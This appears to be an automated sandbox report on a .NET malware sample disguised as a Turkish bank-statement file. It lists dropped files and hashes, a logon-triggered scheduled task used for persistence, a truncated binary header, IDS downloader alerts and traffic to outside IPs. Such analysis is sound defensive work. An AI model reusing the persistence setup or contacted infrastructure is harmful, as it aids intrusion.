C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aioph3vh.0a0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgc3ycdc.pov.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwagobef.da2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pcb53zlg.yta.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcefdyoo.zoc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uu4apgkq.hzz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yo13dpg2.dca.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp

Download File

Process:	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1582
Entropy (8bit):	5.108205995142604
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtKvxvn:cgergYrFdOFzOzN33ODOiDdKrsuTKpv
MD5:	97FB19EA3E6DB06077FB6C3278CBA44B
SHA1:	72C6F1DABDDF51B197FF67E25765C9354C9E1945
SHA-256:	A8B5C9AE34FC86A46D97D11BF4355D0FDD904F8AD9442D8C84A4E2817D76495C
SHA-512:	29AE28FBE388728B94B94F00D248B1BA197AA981400C8A9A2BAC42262FCAF945DEDCA3A0935E755BEF0FE945B4D86F44D102F8958BEF532091A2F35C0D7A2905
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpA327.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1582
Entropy (8bit):	5.108205995142604
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtKvxvn:cgergYrFdOFzOzN33ODOiDdKrsuTKpv
MD5:	97FB19EA3E6DB06077FB6C3278CBA44B
SHA1:	72C6F1DABDDF51B197FF67E25765C9354C9E1945
SHA-256:	A8B5C9AE34FC86A46D97D11BF4355D0FDD904F8AD9442D8C84A4E2817D76495C
SHA-512:	29AE28FBE388728B94B94F00D248B1BA197AA981400C8A9A2BAC42262FCAF945DEDCA3A0935E755BEF0FE945B4D86F44D102F8958BEF532091A2F35C0D7A2905
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\UDYiGmDlq.exe

Download File

Process:	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	866816
Entropy (8bit):	7.610429382459309
Encrypted:	false
SSDEEP:	12288:nFMFoFvNLrJG2FYswEHLwSdNY8O7jbXdhb0mqqbNtYKy0QZURoSGb5hfBMG+wy9n:vFnJNY8KDzqCXW0g2edhf5+wFO
MD5:	18709F2606D2834D725A5677BDD4D737
SHA1:	BBC16514AEA1E283BA1863A5DB34C71B0F574FC8
SHA-256:	50087B010B52EC07A7F52A85B56DC43041AAE17B428E6B0AF3D52D797D427682
SHA-512:	758D818DD3D252010E612DED4BF4846F053B1AD9C06D5139C7D65C35A9956EE7655C567C9EFCFDB24122FE1DD55A324BF30277152DA85E56BE2F2E656E853B9E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B................0..0...........N... ...`....@.. ....................................@..................................N..O....`...............................(..p............................................ ............... ..H............text..../... ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............8..............@..B.................N......H............h......f...lA..8.............................................r...ps....}.....s....}......}.....(.......(......(........0..............{....o....o......r{..p.{....s....}.....{....o.......{....o....}....+N...X..{....o..........%...?....%..{.....o....o.....%..{.....o....o.....o....&..{....o......-..{....o .....{....o!......0............{....o"....o#...o$...o%.....r...p(&.....9.....s......{.....{....o.....o'...o(...o)....o*...o+...o....o,.....{....r...p.{....o.....

C:\Users\user\AppData\Roaming\UDYiGmDlq.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.610429382459309
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Hesap_Hareketleri_10122024_html.exe
File size:	866'816 bytes
MD5:	18709f2606d2834d725a5677bdd4d737
SHA1:	bbc16514aea1e283ba1863a5db34c71b0f574fc8
SHA256:	50087b010b52ec07a7f52a85b56dc43041aae17b428e6b0af3d52d797d427682
SHA512:	758d818dd3d252010e612ded4bf4846f053b1ad9c06d5139c7d65c35a9956ee7655c567c9efcfdb24122fe1dd55a324bf30277152da85e56be2f2e656e853b9e
SSDEEP:	12288:nFMFoFvNLrJG2FYswEHLwSdNY8O7jbXdhb0mqqbNtYKy0QZURoSGb5hfBMG+wy9n:vFnJNY8KDzqCXW0g2edhf5+wFO
TLSH:	0F05E064376DCB06C5384BF40A70F2B8237A6D89B821D24B6ED97FDF7876B155A00683
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B................0..0...........N... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4d4eee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x85A342F2 [Thu Jan 17 21:00:34 2041 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007F164CC240F2h
je 00007F164CC240F2h
add byte ptr [ebp+00h], ch
add byte ptr [ecx+00h], al
arpl word ptr [eax], ax
je 00007F164CC240F2h
imul eax, dword ptr [eax], 00610076h
je 00007F164CC240F2h
outsd
add byte ptr [edx+00h], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd4e9c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd6000	0x5cc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xd28a4	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd2f14	0xd3000	3359480ef2598b3f387d0d791df4ecf4	False	0.8348336603969194	data	7.617057442893915	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xd6000	0x5cc	0x600	86a0ff3b1bf1aa25d5e84a950da26ca2	False	0.4264322916666667	data	4.1197924207639725	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd8000	0xc	0x200	1d4cfaef7c80d9f1fdda264cec0a5000	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xd6090	0x33c	data			0.4311594202898551
RT_MANIFEST	0xd63dc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-10T14:07:33.021985+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49738	132.226.247.73	80	TCP
2024-12-10T14:07:35.972279+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49738	132.226.247.73	80	TCP
2024-12-10T14:07:37.424116+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49754	104.21.67.152	443	TCP
2024-12-10T14:07:38.284711+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49756	132.226.247.73	80	TCP
2024-12-10T14:07:38.940982+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49757	132.226.247.73	80	TCP
2024-12-10T14:07:41.144099+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49756	132.226.247.73	80	TCP
2024-12-10T14:07:42.034753+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49771	132.226.247.73	80	TCP
2024-12-10T14:07:42.784056+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49772	104.21.67.152	443	TCP
2024-12-10T14:07:44.331590+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49779	132.226.247.73	80	TCP
2024-12-10T14:07:47.503488+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49788	132.226.247.73	80	TCP
2024-12-10T14:07:53.192135+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49812	104.21.67.152	443	TCP
2024-12-10T14:07:56.282055+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49821	104.21.67.152	443	TCP
2024-12-10T14:07:58.454266+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49829	104.21.67.152	443	TCP
2024-12-10T14:07:59.443577+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49835	104.21.67.152	443	TCP
2024-12-10T14:08:01.817842+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49841	104.21.67.152	443	TCP
2024-12-10T14:08:04.954427+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49850	104.21.67.152	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 14:07:30.859214067 CET	49738	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:30.979341030 CET	80	49738	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:30.979715109 CET	49738	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:30.979773998 CET	49738	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:31.099193096 CET	80	49738	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:32.293127060 CET	80	49738	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:32.347233057 CET	49738	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:32.469508886 CET	49738	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:32.588910103 CET	80	49738	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:32.893028975 CET	80	49738	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:33.021985054 CET	49738	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:33.204751015 CET	49746	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:33.204797983 CET	443	49746	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:33.204874992 CET	49746	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:33.259614944 CET	49746	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:33.259634972 CET	443	49746	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:34.480802059 CET	443	49746	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:34.480890989 CET	49746	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:34.501385927 CET	49746	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:34.501406908 CET	443	49746	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:34.501871109 CET	443	49746	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:34.562582970 CET	49746	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:34.603338003 CET	443	49746	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:35.026155949 CET	443	49746	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:35.026207924 CET	443	49746	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:35.026256084 CET	49746	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:35.112118006 CET	49746	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:35.329545021 CET	49738	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:35.449120998 CET	80	49738	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:35.757839918 CET	80	49738	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:35.760755062 CET	49754	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:35.760796070 CET	443	49754	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:35.760849953 CET	49754	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:35.761430025 CET	49754	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:35.761446953 CET	443	49754	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:35.972279072 CET	49738	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:36.393625975 CET	49756	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:36.512989044 CET	80	49756	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:36.513153076 CET	49756	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:36.513500929 CET	49756	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:36.632828951 CET	80	49756	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:36.971996069 CET	443	49754	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:36.974337101 CET	49754	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:36.974380970 CET	443	49754	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:37.424151897 CET	443	49754	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:37.424220085 CET	443	49754	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:37.424284935 CET	49754	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:37.424916029 CET	49754	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:37.438108921 CET	49738	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:37.453974962 CET	49757	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:37.557790041 CET	80	49738	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:37.557851076 CET	49738	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:37.573473930 CET	80	49757	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:37.573600054 CET	49757	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:37.573723078 CET	49757	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:37.693015099 CET	80	49757	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:37.816762924 CET	80	49756	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:37.820482969 CET	49756	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:37.939881086 CET	80	49756	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:38.243818045 CET	80	49756	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:38.284101009 CET	49763	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:38.284146070 CET	443	49763	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:38.284219027 CET	49763	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:38.284710884 CET	49756	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:38.288492918 CET	49763	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:38.288512945 CET	443	49763	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:38.890465975 CET	80	49757	132.226.247.73	192.168.2.5
Dec 10, 2024 14:07:38.891851902 CET	49764	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:38.891899109 CET	443	49764	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:38.892075062 CET	49764	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:38.892375946 CET	49764	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:38.892388105 CET	443	49764	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:38.940982103 CET	49757	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:39.502002001 CET	443	49763	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:39.502090931 CET	49763	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:39.505043030 CET	49763	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:39.505060911 CET	443	49763	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:39.505403996 CET	443	49763	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:39.550390005 CET	49763	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:40.113004923 CET	443	49764	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:40.134640932 CET	49764	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:40.134661913 CET	443	49764	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:40.314033031 CET	49763	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:40.359343052 CET	443	49763	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:40.558082104 CET	443	49764	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:40.558156967 CET	443	49764	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:40.558216095 CET	49764	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:40.558964014 CET	49764	443	192.168.2.5	104.21.67.152
Dec 10, 2024 14:07:40.562802076 CET	49757	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:40.564081907 CET	49771	80	192.168.2.5	132.226.247.73
Dec 10, 2024 14:07:40.648137093 CET	443	49763	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:40.648192883 CET	443	49763	104.21.67.152	192.168.2.5
Dec 10, 2024 14:07:40.648277998 CET	49763	443	192.168.2.5	104.21.67.152
